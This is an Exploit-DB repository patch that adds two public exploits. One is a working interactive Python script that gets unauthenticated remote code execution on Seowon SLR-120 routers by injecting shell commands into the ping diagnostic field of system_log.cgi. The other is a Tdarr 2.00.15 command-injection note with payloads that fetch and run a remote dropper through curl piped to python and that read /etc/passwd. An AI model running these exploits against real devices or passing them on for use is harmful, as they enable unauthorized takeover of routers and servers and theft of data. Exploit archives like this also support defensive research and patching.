From 653f886e0be5a632fcc95c558a3ee5e127f1a149 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 12 Mar 2022 05:01:35 +0000
Subject: [PATCH] DB: 2022-03-12

2 changes to exploits/shellcodes

Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
Tdarr 2.00.15 - Command Injection
---
 exploits/hardware/remote/50821.py  | 82 ++++++++++++++++++++++++++++++
 exploits/multiple/remote/50822.txt | 15 ++++++
 files_exploits.csv                 |  2 +
 3 files changed, 99 insertions(+)
 create mode 100755 exploits/hardware/remote/50821.py
 create mode 100644 exploits/multiple/remote/50822.txt

diff --git a/exploits/hardware/remote/50821.py b/exploits/hardware/remote/50821.py
new file mode 100755
index 000000000..63e854b47
--- /dev/null
+++ b/exploits/hardware/remote/50821.py
@@ -0,0 +1,82 @@
+# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
+# Date: 2022-03-11
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: http://www.seowonintech.co.kr
+# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30
+# Version: All version
+# Tested on: Windows 10 Enterprise x64 , Linux
+# CVE : CVE-2020-17456
+
+# [ About - Seowon SLR-120 router ]:
+
+#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,
+#The convenience of sharing wireless internet access invigorates your lifestyle, families,
+#friends and workmates. Carry it around to boost your active communication anywhere.
+
+# [ Description ]:
+
+#Execute commands without authentication as admin user ,
+#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.
+
+# [ Vulnerable products ]:
+
+#SLR-120S42G
+#SLR-120D42G
+#SLR-120T42G
+
+import requests
+
+print ('''
+###########################################################
+#    Seowon SLR-120S42G router - RCE (Unauthenticated)    #
+#                  BY:Aryan Chehreghani                   #
+#        Team:TAPESH DIGITAL SECURITY TEAM IRAN           #
+#             mail:aryanchehreghani@yahoo.com              #
+#                 -+-USE:python script.py                 #
+#         Example Target : http://192.168.1.1:443/        #
+###########################################################
+''')
+
+url = input ("=> Enter Target : ")
+
+while(True):
+
+    try:
+
+        cmd = input ("~Enter Command $ ")
+
+        header = {
+"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
+"Accept": "*/*",
+"Accept-Language": "en-US,en;q:0.5",
+"Accept-Encoding": "gzip, deflate",
+"Content-Type": "application/x-www-form-urlencoded",
+"Content-Length": "207",
+"Origin": "http://192.168.1.1",
+"Connection": "close",
+"Referer": "http://192.168.1.1/",
+"Upgrade-Insecure-Requests": "1"
+}
+
+        datas = {
+'Command':'Diagnostic',
+'traceMode':'ping',
+'reportIpOnly':'',
+'pingIpAddr':';'+cmd,
+'pingPktSize':'56',
+'pingTimeout':'30',
+'pingCount':'4',
+'maxTTLCnt':'30',
+'queriesCnt':'3',
+'reportIpOnlyCheckbox':'on',
+'logarea':'com.cgi',
+'btnApply':'Apply',
+'T':'1646950471018'
+}
+
+        x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)
+
+        print(x.text)
+
+    except:
+        break
\ No newline at end of file
diff --git a/exploits/multiple/remote/50822.txt b/exploits/multiple/remote/50822.txt
new file mode 100644
index 000000000..0b012257b
--- /dev/null
+++ b/exploits/multiple/remote/50822.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Tdarr 2.00.15 - Command Injection
+# Date: 10/03/2022
+# Exploit Author: Sam Smith
+# Vendor Homepage: https://tdarr.io
+# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
+# Version: 2.00.15 (likely also older versions)
+# Tested on: 2.00.15
+
+Exploit:
+
+The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.
+
+eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.
+
+Tdarr is not protected by any auth by default and no credentials are required to trigger RCE
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 255d64cc3..bb3d82f8b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18647,6 +18647,8 @@ id,file,description,date,author,type,platform,port
 50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
 50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
 50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware,
+50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
+50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,